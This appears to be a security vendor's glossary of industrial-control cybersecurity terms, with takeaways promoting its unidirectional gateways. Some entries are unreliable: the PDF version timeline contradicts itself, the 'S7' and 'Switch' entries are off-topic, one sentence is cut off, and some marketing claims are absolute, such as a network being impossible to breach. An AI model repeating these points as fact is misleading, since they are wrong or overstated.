Relevancy to Unidirectional Gateways: Unidirectional communications technology is recommended as an effective cyber security control for communication pathways in developing a cyber security plan protecting “Critical Digital Assets”. Unidirectional communications technology is also recommended as a part of a thorough defense-in-depth protective strategy, emphasizing that a defensive cyberseucirty architecture separates security boundaries at which digital communications are monitored and restricted. . If data flows between different security level networks and firewalls are used (a.k.a. non-deterministic boundary device) the plan must include additional criteria that the device will comply with Section 6 of NEI 08-09 on non-deterministic data flow criteria. If unidirectional communication technology is used (a.k.a. deterministic boundary device) the description of the data flow rules can be brief.

Waterfall’s takeaway: Compliance is simplified through the implementation of unidirectional technology. Within a thorough defense-in-depth security architecture, if unidirectional communications technology is implemented as a security boundary control device, the licensee is exempt of 21 minimum security requirements.

Source: nrc.gov

NSA

The National Security Agency/Central Security Service (NSA/CSS) leads the U.S. Government in cryptology that encompasses both signals intelligence (SIGINT) insights and cybersecurity products and services and enables computer network operations to gain a decisive advantage for the nation and her allies.

OPC

Open Platform Communications: A standard for exchanging data securely in industrial automation and other areas. OPC is a key part of Industry 4.0, a movement towards smart manufacturing. OPC is platform-independent, allowing devices from different manufacturers to exchange information. The latest version of the standard is OPC UA, which is platform-independent and supports semantic data description.

OPC-DA

OPC DA, or Open Platform Communications Data Access, is a protocol that allows access to process data in real time: OPC DA is a client-server standard that allows software applications to retrieve real-time data from devices like PLCs, HMIs, SCADA systems, and ERP/MES systems.

OPC A&E

OPC Alarms and Events (OPC A&E) is a data communications protocol that allows for the exchange of alarm and event information between OPC servers and clients. OPC A&E data can be used to: Notify operators and management of system issues, Sequence events to optimize operations, Schedule maintenance, and Predict equipment failure.

OPC HDA

OPC Historical Data Access (OPC HDA) is a standard for exchanging and analyzing archived process data: OPC HDA is used for analysis, optimization, inventory control, regulatory compliance, and more.

ONR (UK Plan)

What is it: The Office for Regulation has stated in its strategic plan that one of the main factors that will influence its regulatory work during 2016 – 2020 is the range of threats “to the security of the nuclear industry, including threats to cyber security” and that it can be “assumed that the capabilities of potential adversaries to operate in cyberspace will continue to grow”. ONR’s work is focused on influencing improvements in nuclear safety and security, and stakeholder confidence. Regarding cyber security, the organisation’s plan is to “develop and publish new guidance for civil sector duty-holders to take full ownership of their security, particularly regarding cyber security, in accordance with modern outcome focused security regulation.”

Source: onr.co.uk (PDF)

Operational Technology (OT)

Hardware and software routinely found on SCADA or “operations” networks. For example: human-machine interfaces, device communications servers, alarm systems, process historian databases, file servers and printers.

Operator

The person using a SCADA system HMI to operate a physical process.

OSHA

OSHA stands for Occupational Safety and Health Administration, which is an American federal agency that ensures safe and healthy working conditions for employee.

OSIsoft

OSIsoft was a company that developed application software for real-time data management. The company was founded in 1980 by J. Patrick Kennedy and was headquartered in San Leandro, California. In 2021, OSIsoft was acquired by AVEVA, a UK-based production company, for $5 billion. The software developed by OSIsoft is now known as the AVEVA PI System.

Process Control Network

A Process Control Network is a communications network that transmits data and instructions between control and measurement units, and Supervisory Control and Data Acquisition (SCADA) equipment.

PDF

Portable Document Format (PDF), standardized as ISO 32000, is a file format developed by Adobe in 1992 to present documents, including text formatting and images, in a manner independent of application software, hardware, and operating systems.

The Portable Document Format (PDF) has an interesting history dating back to the early 1990s. In 1991, Adobe co-founder John Warnock began working on what was known as “The Camelot Project.” The goal was to create a file format that could “capture” documents from any application and send electronic versions to “anyone, anywhere,” while maintaining their exact look and formatting. This was a significant challenge at the time, as documents often lost formatting when shared between different computers or platforms.

In 1992, Adobe developed this concept into PDF. The first publicly available PDF tools were Acrobat 1.0 and Adobe Reader (initially called Acrobat Reader), released in 1993. The first version was relatively basic, supporting simple text, basic images, and hyperlinks.

Key features throughout PDF history:
1996: PDF 2.0 adds support for color management, encryption, and interactive forms
1999: Adobe makes the PDF specification freely available
2000: PDF 4.0 introduces tagged PDF for improved accessibility
2001: PDF/X standard is created for the printing industry
2004: PDF 1.6 adds 3D support and multimedia capabilities
2008: PDF is recognized as an open standard (ISO 32000-1:2008)
2017: PDF 2.0 (ISO 32000-2:2017) is released with significant improvements

The format’s major strengths are:

Platform independence
Preservation of formatting
Built-in compression
Support for digital signatures
Ability to embed fonts
Support for metadata
Security features

Today, PDF remains the de facto standard for document sharing, particularly in professional and legal contexts. It’s estimated that there are hundreds of billions of PDF documents in existence.

Perimeter

A logical or physical boundary separating networks of varying levels of criticality and consequence threshold.
See also: cyber perimeter, physical perimeter.

PHA - Process Hazard Analysis

An analysis of an industrial process to identify potential failure points and other factors that could lead to accidents.

Phasor

A line used to represent a complex electrical quantity as a vector.

Phishing

Email that seeks to deceive a recipient into activating malware attachments, or divulging credentials

PII (Personally Identifiable Information)

Personally identifiable information (PII) is information that can identify an individual., either used alone, or with other relevant data.

Pivot (attack)

Using a compromised computer to attack other computers, often other computers deeper into layers of networks in a defensive architecture.

PKI (Public Key Infrastructure)

Public Key Infrastructure (PKI) is a system of policies, technologies, and processes that allows for the encryption and signing of data. PKI uses digital certificates to authenticate the identity of users, devices, or services.

PLC

PLC stands for Programmable Logic Controller, which is a small, solid-state computer that controls and monitors industrial equipment: PLCs are used in industrial control systems (ICSes) to automate tasks such as operating assembly lines, robotic devices, and machines. They are known for being rugged and able to operate continuously without maintenance.

PMU (Power Management Unit)

The PMU is typically an integrated circuit (chip) that controls the power to some component in an electronic device. Also called a power management IC (PMIC). PMUs are widely used in mobile devices.

Practical Case for a Road Tunnel - Part 2 Measures (Guidance, France)

What is it: (2014)The objective of this case study is to illustrate a complete and concrete example: a road tunnel. The first part of this study provides details on the complete method of classification, as such showing how to take certain elements into account. After a presentation of the scope and the context of the case study, the various threats are analysed by specifying the possible links between cybersecurity and dependability. From these threats then stem the likelihood of an attack and therefore the class of each function. Finally, the various possible groupings between classes are compared in order to define the final architecture. The second part of the case study corresponds to the implementation of measures present in the two guides. The architecture retained at the end of the first part is thus analysed macroscopically, with regard to the main measures of the first guide. A proposal for securing the tunnel is then made using the second guide, by starting with the organisational measures followed by the technical measures.

Relevancy to Unidirectional Gateways: Section A9 is entirely devoted to “Diode”. Partitioning ICS: The industrial IS has to be broken down into coherent zones that are physically partitioned, with filtering between zones. The administration must in addition be carried out through the intermediary of a dedicated network that is not connected to Internet. The unidirectionality of the flows between C3 and the lower classes is provided by a hardware data diode. A hardware data diode has to protect the unidirectional flow from C3 to the management IS. Dioe: it is possible to have information transit from a network of a given class to a network of a lower class, but it is imperative to block any command from a lower network to a network of a higher class.

Waterfall Takeaway: This document provides a concrete application of unidirectional gateways as per the guidance in the Cybersecurity for ICS document. Reinforcing the security measure with a real example of an industrial operational network, making a very strong case for Waterfall.

Source: cyber.gouv.fr

Primary Defenses

Defensive measures designed as the first line of defense against attacks.

Process Historian

A database optimized to store and manipulate large amounts of time-sequenced data, such as sensor readings from an industrial process.

Protection Equipment

Industrial devices monitoring sensors in an industrial process, and triggering automatic actions to bring the system back into a safe state when sensors or combinations of sensors ever exceed designated limits. Protection equipment is designed to prevent damage to industrial equipment.

Protective Relay

A device that monitors sensors in an electrical system, and signals an electric breaker to interrupt current to a part of the system when designated limits are exceeded. Protective relays are designed primarily to prevent damage to industrial equipment, and secondarily to protect safety. Many conditions able to pose threats to industrial equipment can also pose threats to personnel safety and environmental integrity.

Quantum Cryptography

Definition: Quantum cryptography leverages the principles of quantum mechanics to create secure communication channels. The most widely known application of quantum cryptography is Quantum Key Distribution (QKD), which uses quantum particles (like photons) to transmit cryptographic keys. Any attempt to intercept or eavesdrop on the communication causes detectable disturbances in the quantum states, alerting the involved parties to the breach.

Importance in Cybersecurity: As traditional cryptographic methods may become vulnerable with the advent of quantum computing, quantum cryptography provides a future-proof way to secure sensitive data. Quantum computers could potentially break widely used encryption algorithms like RSA or ECC, making quantum cryptography a crucial research area to ensure continued data protection in the post-quantum era.

Example in OT Security: In OT environments, especially in sectors like energy, utilities, and defense, where data confidentiality and system integrity are critical, quantum cryptography could be used to secure communication between control systems and remote sensors. This would ensure that malicious actors cannot intercept, alter, or disrupt operational data, thus protecting critical infrastructure from cyberattacks, even in a world where quantum computing is a reality.

RAT

Remote Administration Tool (or Remote Access Trojan) – Malicious software that provides a remote attacker with administrative privileges on a compromised computer.

Rail Cyber Security: Guidance to Industry (Guidance)

What is it: This guidance is concerned with protecting rail infrastructure and rolling-stock systems and handling threats and incidents. The Department for Transport (DfT) is looking to encourage the use of the US NIST cybersecurity framework amongst UK companies that operate critical infrastructure. Rail systems are becoming more vulnerable to cyber attack due to the integration of open-platform systems, equipment using COTS components and increased prevalence of control and automation systems that can be accessed remotely via public and private networks. The guidance applies to all rail networks in Great Britain to include high speed heavy rail, conventional heavy rail, London Underground, Docklands Light Railway, Glasgow Subway

Relevancy to Unidirectional Gateways: As signals are of critical importance from a safety perspective, the guidance states that signaling systems on rail networks should contain unidirectional gateways. Train control and signaling – networks for passengers should be physically or electronically separate from networks used for train control and signaling (especially where WiFi is used).

Waterfall Takeaway: The attack surface of rail networks is rather large due to multiple systems control, signaling, IT and passenger networks. The DfT understands the threat cyber attacks can have on public safety and recommends the strongest technology for its signal systems – unidirectional gateways.

Source : gov.uk

Removable Media

Any digital storage medium. For example: CD-ROMs, DVDs, USB drives, floppy disks, and almost all cell phones.

Residual Risk

Any risk an organization chooses to accept, rather than mitigate or transfer. The residual risk to which an organization is exposed is a measure of how secure that organization is.

RIIA (Guidance, UK)

What is it: This report finds that the trend toward connecting business systems with nuclear facilities introduces a host of cyber vulnerabilities to nuclear facilities that nuclear plant personnel may not be aware of. This report focuses on cyber attacks that seek to take over nuclear industrial control systems acting either inside or outside of the facilities where these systems are located. The authors of the report believe that many of the findings and guidelines also apply to wider critical infrastructure, to include power grids, transport networks, and maritime shipping. The report emphasizes the necessity of unidirectional communication technology at nuclear facilities; concerning both protecting the network perimeter from the IT network and vendor VPN remote access. The report notes a number of specific recommendations to address the challenges identified in the study. It is recommended that in order to address the challenge of enhancing security – due to insufficient spending on cyber security within the nuclear industry – they encourage the further adoption of secure unidirectional communications technology

Relevancy to Unidirectional Gateways: The report states that it would be fairly straightforward for a hacker to breakthrough a firewall and gain access to the ICS network, however with unidirectional communication technology installed, the network impossible to breach. For protecting the ICS network the results of the study are clear – firewalls aren’t good enough: they are reactive rather than anticipatory, attacks can go undetected, and attacks are detected when they are already inside the network. The report highlights seven known cyber security incidents at nuclear facilities around the world which could have been prevented with Unidirectional Security Gateways.

Waterfall Takeaway: Nuclear facilities in the UK are becoming increasingly reliant on digitization and commercial software. This recent trend has presented a growing attack surface area for nuclear plants. The UK and Europe are beginning to catch on to the trend toward unidirectional communication technology to protect the national critical infrastructure which could cause the most widespread damage if breached. The case is made strong in this report, unidirectional gateways are the way to go.

Root

Root is the highest permission elevation on a computer system. Root is also known as the Root User or a Super User. Root permission is typically reserved for those who are authorized to make operating system level changes.

Router

A networking device that forwards data packets between computer networks

RSA (cryptosystem)

RSA (Rivest–Shamir–Adleman) is a public-key cryptosystem, one of the oldest widely used for secure data transmission.

RSV

The RSV data file format is a simple binary alternative to CSV. This document describes the data structure behind RSV and defines the encoding used.

RTU

RTU stands for Remote Terminal Unit, an electronic device that connects physical devices to a larger control system: RTUs act as a link between the physical world and a supervisory control and data acquisition (SCADA) system. They collect data from field devices, such as sensors, valves, and actuators, and send it to the SCADA system. The SCADA system then sends commands back to the RTU to control the connected devices.

S4 (Conference)

The S4 conference is a technical event that focuses on the future of Industrial Control Systems (ICS) and Operational Technology (OT) cybersecurity. The conference is for practitioners, asset owners, operators, and suppliers in these fields.

S7

S7 is an object-oriented programming (OOP) system for R that combines the best features of S3 and S4. S7 is being developed by The R Consortium Working Group on OOP.

Sabotage (Cyber Sabotage)

Cyber sabotage is a deliberate act that aims to disrupt, destroy, or impair networks and information systems. The goal is to cause chaos or inflict damage, often by exploiting vulnerabilities in digital infrastructure. Cyber sabotage can target organizations, governments, or nation-states, and can range from defacing websites to disabling critical infrastructure.

Safety Instrumented System (SIS)

An industrial device or cooperating set of devices monitoring sensors in an industrial process, and triggering automatic actions to bring the system back into a safe state when sensors or combinations of sensors ever exceed designated limits. The safe state is most commonly a complete shutdown of the industrial process. SIS equipment is designed to protect human life and environmental integrity.

Safety Program

A set of policies, procedures and technologies designed to protect human life and environmental integrity.

Sandbox

A virtual machine in which complex files are opened by their respective applications. The virtual clock on the machine is advanced, and other measures are taken to try to stimulate the activity of any embedded malware. The virtual machine is then monitored to try to
detect the operation of malware. For example, does the machine send messages to the Internet, or create unexpected files anywhere in the filesystem? Limitations: Malware authors have started producing sandbox-aware malware that detects that it is operating in a sandbox and carries out none of the usual suspicious activities when a sandbox is detected. Malware authors have also demonstrated the ability to exploit vulnerabilities in the sandbox mechanism to escape from the sandbox and infect the computer running the sandbox.

SBOM

A Software Bill of Materials (SBOM) is a detailed list of the components and modules that make up a piece of software, including: The components and their supply chain relationships, The licenses that govern the components, The versions of the components, and The patch status of the components. SBOMs are created by software developers and vendors to ensure transparency and traceability of code components, facilitate supply chain security, ensure compliance with regulations, and improve cybersecurity.

SCADA

SCADA is an acronym for Supervisory Control and Data Acquisition, which is a computer system that monitors and controls industrial processes and equipment in real time. SCADA systems are used in many industries, including:transportation, oil and gas, energy, waste control, water, and telecommunications.

SCP

Secure Copy Protocol: A network protocol that allows users to transfer files between hosts on a network. SCP uses Secure Shell (SSH) for data transfer and authentication to ensure the confidentiality of the data.

SDN (Software-Defined Network)

Software-Defined Networking (SDN) is a network architecture that uses software to control and manage networks

Secure Remote Access

What they are: Secure Remote Access (SRA) systems are collections of software and hardware that allow people to operate sensitive OT computers remotely. SRA systems almost always include VPNs, two-factor authentication, and remote access software such as the ubiquitous Windows Remote Desktop.

Where to use: Remote access into critical systems is strongly discouraged by most experts and in fact illegal in some jurisdictions. Remote access systems are used routinely inside industrial networks, all at the same level of criticality, to permit users on the one side of a large plant to manipulate automation equipment on the other side, or equipment that is in locations that are dangerous to physically walk into.

Intrinsic Limitations: All remote access systems are software, with vulnerabilities discovered and undiscovered. A phished password is often all an attacker needs to impersonate a legitimate user in the remote access system. Two-factor authentication systems for remote access are the subject of active exploitation by nation-state threat actors.

Secure Shell (SSH)

An application that issues commands to a remote machine, and receives their responses, over an encrypted network connection. Limitations: Ssh is software and has vulnerabilities. The simplest way to subvert ssh is a “man in the middle” attack. Ssh will diagnose the attack, but most users ignore the “you may be under attack” warning and continue using the tool. Another way to subvert ssh is to compromise an authorized remote ssh endpoint or laptop.

Security of Critical Infrastructure Act 2018 (SOCI Act 2018) (Act)

What is it: Protects essential services including manufacturing in Australia.

Relevancy to Unidirectional Gateways:Directly relevant as it defines obligations for protecting critical infrastructure, where unidirectional gateways are essential.

Secure Remote Access

A combination of security strategies that allow users to operate technology remotely while protecting the security of networks and data such as Waterfall’s HERA (Hardware Enforced Remote Access)

Security Risk Assessment

An evaluation of potential threats to a security system and the development of countermeasures. It helps decision-makers make informed decisions about the effectiveness of the security system.

Security Updates / Patches

What they are: Security updates are new versions of software that are supposed to correct exploitable software defects (software vulnerabilities).

Where to use: Many experts recommend that security updates be applied universally, to all industrial systems as quickly as practical. This is practical on non-critical networks but can be extremely expensive on the most critical networks, because of the engineering effort involved in investigating and validating a new version of software on safety-critical or reliability-critical networks.

Intrinsic Limitations: Some security updates are defective, and either do not repair the vulnerability they are intended to or introduce new and sometimes even more serious vulnerabilities than the one they nominally fix. Security updates correct known defects in software – they do nothing to correct unknown “zero-day” defects, poorly chosen or leaked passwords, poorly configured security systems or firewalls, or insiders misusing their credentials.

Semiconductor

A solid material that can conduct electricity under certain conditions and block it in others:
Electrical conductivity: Semiconductors have electrical conductivity that’s between that of an insulator and most metals.

Setpoint

In cybernetics and control theory, a setpoint is the desired or target value for an essential variable, or process value (PV) of a control system, which may differ from the actual measured value of the variable. Departure of such a variable from its setpoint is one basis for error-controlled regulation using negative feedback for automatic control. A setpoint can be any physical quantity or parameter that a control system seeks to regulate, such as temperature, pressure, flow rate, position, speed, or any other measurable attribute.

SESAR - Addressing Airport Cybersecurity (EU Study)

What is it: The study’s objectives are to:

Identify potential weaknesses in SESAR APOC / TAM;
Investigate accreditation and assurance for building trust;
Investigate and assess information sharing and threat mechanisms;
Investigate common cyber-situational awareness and collaborative decision making.

The focus of the study is the SESAR APOC concept – i.e. the APOC of the future, rather than today’s preliminary APOCs. However, the study is informed by the practical considerations of the concept at Groupe ADP, thereby providing a real-life insight into how the concept will develop. The study was completed between June and October 2016.

Relevancy to Unidirectional Gateways: Data Diodes are promoted to make certain data sources read-only, “such as relating to passengers”.

“Since more and more services are interconnected, security systems are fully deployed, such as Intrusion Detection System (IDS), Intrusion Prevention System (IPS), segregation/zoning and access control. A security architecture would offer depth and resilience. Since some AOP data sources can be read-only, then data diodes4 can be used. Audit and penetration tests are performed regularly.”

“A data diode is a network device that allows data to travel only in one direction.”

“However, due to the high number of APOC interfaces, one important application of the separation principle is to look at which data feeds are ‘read only’ (as opposed to ‘read and write’) and to use data diodes to isolate and protect these feeds.”

Waterfall Takeaway: The cyber section of this study talks about SESAR which is the technological arm of the Single European Sky initiative, which delivers new operational concepts, procedures and systems to support eh SES objectives. The document is strong in that it emphasizes PREVENTION of compromise to threats, and acknowledges that cyber space includes physical as well as virtual elements.

Recommending data diodes for read only data is a start, demonstrates limited scope and understanding of the usefulness of unidirectional technology for airport operations.

Source: SESAR (PDF)

Shutdown

A plant shutdown is a temporary halt in production at an industrial facility to perform maintenance, repairs, or upgrades. Shutdowns are also known as turnarounds or outages. Plant shutdowns are planned in advance to minimize production interruptions and ensure the plant operates safely and efficiently. They can last from a few hours to several weeks, depending on the work required

SIEM

SIEM stands for Security Information and Event Management, and it’s a security management system that combines security information management (SIM) and security event management (SEM): SIEM helps organizations detect, analyze, and respond to security threats. It collects event log data from various sources, identifies abnormal activity, and takes action.

Signature-based Intrusion-Detection System

An intrusion-detection system with rules called “signatures” that identify suspicious behaviors for a computer, network or other system. The system raises alerts when the behavior of the system matches a rule. Limitations: Most intrusion-detection systems are software, and contain vulnerabilities that may be exploited. In addition, signatures are generally updated in signature-based systems only when new types of attacks come into widespread use. One common way to defeat signature-based intrusion-detection system is to steal credentials and log in remotely, rather than use traditional “attack” tools that match signatures. Another is to write new attack code or malware that does not match any existing signature.

Singapore’s Cybersecurity Act’s Codes of Practice (CCoP 2.0) (Standard)

What is it: Cybersecurity standard for Critical Information Infrastructure (CII) owners in Singapore.

Relevancy to Unidirectional Gateways:Directly relevant as it governs cybersecurity for critical information infrastructure, likely including unidirectional gateways.

Source: CSA (PDF)

Snake

Snake was malware developed by the Federal Security Service of Russia. It was one of the most used tools by FSB’s Center 16 and formed a part of the Turla toolset. It saw use in at least 50 countries, being employed to collect data from government networks, diplomatic communication and research facilities.

Sneakernet

Carrying computers, USB drives and other machine readable information past physical security boundaries into SCADA systems.

SNMP

Simple Network Management Protocol (SNMP) is a networking protocol that allows users to monitor and manage network devices connected over an IP network. SNMP is part of the Transmission Control Protocol/Internet Protocol (TCP/IP) family.

SOAP

Simple Object Access Protocol (SOAP) is a lightweight XML-based protocol that is used for the exchange of information in decentralized, distributed application environments. You can transmit SOAP messages in any way that the applications require, as long as both the client and the server use the same method.

SOC

Security Operations Center: A center that monitors and responds to threats to an organization’s systems and data. SOCs can help organizations detect and respond to threats quickly, reducing the potential for data loss or downtime. They can also help organizations comply with data privacy regulations.

Software

Software is a set of written instructions that can be stored and run by hardware. Hardware derived its name from the fact it is hard or rigid with respect to changes, whereas software is soft because it is easy to change.

Software-defined Networks

What they are: Software-defined networks (SDN) are network components such as firewalls, switches, routers plus management software. The software can reconfigure the network components to meet changing network and cybersecurity needs. For example, if a SOC declares a major compromise of the IT network, OT SDNs might reconfigure IT/OT firewalls to start blocking 100% of traffic, permitting nothing through until the emergency condition clears. Another example: a natural gas pipeline SCADA center might communicate with compressor stations across the pipeline’s own fibre normally, but if the fibre is severed in a construction mistake, the SDN causes that communications to fail over transparently to satellite feeds, or VPNs through the Internet, or low-speed modems running through leased telephone lines.

Where to use: SDNs are used more commonly for high-availability communications than for security in industrial contexts. SDNs are occasionally connected to network IPS systems – when the IPS needs to interrupt a communications session carrying an attack in progress, the IPS interacts with the SDN software to block the session.

Intrinsic Limitations: All SDNs are software, with vulnerabilities already discovered and undiscovered. All SDNs control communications equipment and are blind to attacks carried on USB thumb drives or laptop computers.

SPAN Port (Mirror Port)

A SPAN (Switched Port Analyzer) port, also known as a mirror port, is a software feature on a router or switch that copies selected packets passing through the device and sends them to a specific destination

Spear-phishing

Phishing email designed with a particular individual in mind, generally reflecting information found on social media and other Internet sites.

SQL

Structured Query Language (SQL) is a domain-specific language used to manage data, especially in a relational database management system (RDBMS). It is particularly useful in handling structured data, i.e., data incorporating relations among entities and variables.

SRA

Security Risk Assessment
An evaluation of potential threats to a security system and the development of countermeasures. It helps decision-makers make informed decisions about the effectiveness of the security system.

Steganography

The study of hiding information in plain sight – for example, encoding an information stream in the low-order bits of pixel values in an image, thus changing the image to store information in ways that are imperceptible to a human eye.

Stuxnet

Stuxnet is a malicious computer worm first uncovered in 2010 and thought to have been in development since at least 2005. Stuxnet targets supervisory control and data acquisition (SCADA) systems and is believed to be responsible for causing substantial damage to the nuclear program of Iran. Although neither country has openly admitted responsibility, multiple independent news organizations recognize Stuxnet to be a cyberweapon built jointly by the United States and Israel in a collaborative effort known as Operation Olympic Games. The program, started during the Bush administration, was rapidly expanded within the first months of Barack Obama’s presidency.

Switch

A device for making and breaking the connection in an electric circuit.

Security PHA review

Reviews the most common methods for process hazard analysis (PHA) of process industry plants, and then explains how to supplement those methods with an additional security PHA review (SPR) study to determine if there are any cyberattack vectors that can cause significant physical damage to the facility.

TSA Pipeline Security Directive (Directive, USA)

Summary: Enhances security of pipeline infrastructure

Relevancy to Unidirectional Gateways: May be relevant as it includes cybersecurity measures for pipeline systems that could involve unidirectional gateways.

Source: TSA Security Directive (PDF)

Unidirectional Gateways

What they are: The US NIST glossary defines unidirectional gateways as a combination of hardware and software: the hardware is physically able to send information in only one direction, and the software makes copies of servers and emulates devices. Unidirectional Gateways are used routinely to send information from industrial networks out to business automation in IT networks, with no chance that cyber attacks can penetrate from the IT network into sensitive OT / industrial networks. Unidirectional gateways routinely replicate process historians, OPC servers and other industrial devices to IT networks, where IT users and applications access the replicas normally. Since unidirectional gateway vendors serve civilian rather than military markets, sales volumes are often higher than for data diode vendors, and thus gateway providers can often afford to invest in modern user interfaces, redundancy options and other features expected of industrial-grade equipment.

Where to use: The right place to use unidirectional gateways is at a consequence boundary – between an industrial network whose worst-case safety or reliability consequences of compromise are unacceptable, and a business network whose worst-case consequences include acceptable business losses and reputational damage. Unidirectional gateways can also be used to send information into classified military and government networks when the government in question recognizes the gateway supplier as sufficiently trustworthy to permit their equipment to connect to classified networks.

Intrinsic Limitations: Unidirectional gateways control the flow of network packets – they do nothing about potentially contaminated USB drives, or laptops, or cell phones being carried into OT networks. Unidirectional gateway software – like any software – has vulnerabilities that can be exploited. However, even if such vulnerabilities are exploited, the unidirectional hardware is still physically incapable of propagating any attack back into the protected OT network.

Virtual Local Area Networks

What they are: Virtual Local Area Networks (VLANs) are a feature of managed switches. These switches (LANs) can be configured to have groups of ports on the switch behave as if they were separate switches – “virtual” LANs. This might save a little money and can make the LAN configurations a little more flexible. When a machine needs to be moved from one LAN to another, only the switch needs to be reconfigured, no wires need to be moved.

Where to use: VLANs are recommended only when all virtual networks on the switch are at the same level of criticality. VLANs are not recommended to separate networks at different levels of criticality – for example, it is not recommended to host a gasoline pipeline’s IT network and SCADA network in separate VLANs on the same switch.

Intrinsic Limitations: VLANs are software, with vulnerabilities discovered and undiscovered. Stolen switch passwords can reconfigure switches and VLANs very quickly, putting control system components at risk.

Virtual Private Networks

What they are: Virtual private networks (VPNs) encrypt and authenticate communications as they pass through an untrusted network, such as the Internet. VPNs provide the illusion of a direct connection between hosts, networks or a host and a network – a “virtual” direct connection, when hardware-based connections are not available. Modern VPN software often includes the ability to check the integrity of laptops and other endpoints when connecting to sensitive networks. Integrity checks often include: Is AV installed and up to date? Are all security updates installed? Is the laptop still otherwise configured in a way that is consistent with corporate security policy for the laptop? The VPN tends to permit a device to connect to a sensitive network only if all these checks pass. VPNs may also be built into firewalls as a feature.

Where to use: VPNs are used routinely to connect distant industrial stations, such as compressor stations, pumping stations, and electrical substations, into central SCADA systems. VPNs are used routinely as one of the security measures that is part of “secure remote access” systems.

Intrinsic Limitations: VPNs use encryption, and so all the limitations of cryptosystems apply here: VPNs have little value if keys have been stolen, VPNs are software that can be compromised, VPNs offer no protection against compromised endpoints, and so on.

Whaling

Definition: Whaling is a type of highly targeted phishing attack that focuses on senior executives or other high-profile targets within an organization. Unlike typical phishing attacks that are sent to large numbers of people, whaling attacks are tailored specifically for individuals who have access to critical information or assets, such as CEOs, CFOs, or other key decision-makers. The attacker often impersonates a trusted party, like a business associate or internal colleague, to manipulate the victim into disclosing sensitive information or transferring funds.

Importance in Cybersecurity: Whaling is particularly dangerous because it exploits human factors at the highest level of an organization, where decisions involving large sums of money or highly confidential information are made. Successful whaling attacks can result in significant financial loss, data breaches, or even reputation damage for a company.

Example in OT Security: In the context of Operational Technology (OT) security, a whaling attack could target executives responsible for critical infrastructure, such as a power plant or manufacturing facility. The attacker might pose as a trusted vendor or government regulator, convincing the executive to approve changes to OT systems, which could lead to disruptions in industrial processes, safety risks, or even sabotage of critical infrastructure. Therefore, it is essential for OT leadership to be trained in identifying and mitigating whaling attempts to protect the integrity of operations.

XSS (Cross-Site Scripting)

Definition: Cross-Site Scripting (XSS) is a type of security vulnerability typically found in web applications. It occurs when an attacker injects malicious scripts into content from trusted websites. XSS allows attackers to execute scripts in the victim’s browser, which can lead to actions like data theft, session hijacking, or defacement of websites.

Types of XSS:

Stored XSS: The malicious script is permanently stored on the target server (e.g., in a database), and every time the user accesses the page, the script is executed.
Reflected XSS: The malicious script is reflected off a web server, like in a search result or error message, and is delivered to the user via a URL or another method.
DOM-based XSS: This type of XSS exploits vulnerabilities in the Document Object Model (DOM) environment within a user’s browser.

Importance in Cybersecurity: XSS attacks can have serious consequences for both users and organizations. Attackers can use XSS to gain control over user sessions, steal sensitive information, or perform unauthorized actions on behalf of the user.

Example in OT Security: Although XSS is generally a web-based vulnerability, as OT systems increasingly use web interfaces for monitoring and management, XSS could be used to compromise an OT system. For example, an attacker could exploit an XSS vulnerability in a web-based Human-Machine Interface (HMI) to gain unauthorized control over critical OT operations, such as adjusting safety settings or shutting down systems remotely. Therefore, securing web interfaces in OT environments against XSS is crucial to maintaining operational security.

YAML (YAML Ain't Markup Language)

Definition: YAML is a human-readable data serialization standard often used for configuration files and data exchange between languages with different data structures. It is designed to be easily readable and writable by humans while still being usable for complex data structures. YAML uses indentation to define structure, making it more intuitive for developers compared to formats like JSON or XML.

Importance in Cybersecurity: YAML is widely used in security-related applications, especially for defining infrastructure-as-code (IaC) in DevOps and security automation processes. Configuration management tools like Ansible, Kubernetes, and Docker use YAML to define infrastructure, policies, and access controls. Properly secured and verified YAML configurations are crucial to avoid vulnerabilities such as misconfigurations that could lead to unauthorized access or insecure deployments.

Example in OT Security: YAML is often used to configure cloud and edge devices integrated into OT networks. Ensuring the integrity and security of YAML files that configure these systems is critical to preventing configuration-based attacks that could compromise industrial processes or critical infrastructure.

Zero-Day

Definition: A zero-day vulnerability refers to a software or hardware security flaw that is unknown to the parties responsible for fixing it, such as the vendor or developer. The term “zero-day” comes from the fact that the vulnerability is exploited by attackers before developers have had a chance to create a patch or fix. When a zero-day exploit is used by attackers, it can cause widespread harm because there is no immediate defense available. Once the vulnerability is made public and a fix is developed, it is no longer considered a zero-day.

Importance: Zero-day vulnerabilities are highly sought after by cybercriminals and nation-state actors because they can be exploited to launch attacks with a high degree of success. They are often used in sophisticated attacks like Advanced Persistent Threats (APT) or malware campaigns. This includes finding

Example: In 2020, a critical zero-day vulnerability in Zoom allowed attackers to potentially access meeting data without users’ knowledge.

Zero Trust

Definition: Zero Trust is a cybersecurity framework that operates under the principle of “never trust, always verify.” In this model, no user, device, or system—whether inside or outside an organization’s network— is trusted by default. Every access request is thoroughly authenticated, authorized, and continuously validated based on multiple factors like user identity, device health, and network context.

Relation to OT Security: In Operational Technology (OT) environments, Zero Trust is particularly important due to the critical infrastructure involved, such as industrial control systems (ICS), manufacturing plants, and utilities. Traditional OT systems were often designed to operate in isolated networks, assuming that perimeter security was sufficient. However, as these systems become more interconnected and integrated with IT networks, the attack surface expands, making them more vulnerable to cyber threats.

Applying Zero Trust to OT security involves:

Segmentation: Creating smaller, more manageable zones within the OT network to limit lateral movement of threats.
Access Control: Enforcing strict identity verification for every user or device trying to access critical OT systems.
Continuous Monitoring: Continuously assessing the health and security posture of all OT assets to detect anomalous or unauthorized activity in real-time.
Least Privilege: Limiting access rights for users and systems to only what is necessary for their function to reduce potential risks.

Importance: Implementing Zero Trust in OT environments helps mitigate risks such as insider threats, advanced persistent threats (APTs), and supply chain attacks, providing a more resilient approach to securing critical infrastructure.

Next generation Secure Remote Access

Unlimited Access to OT data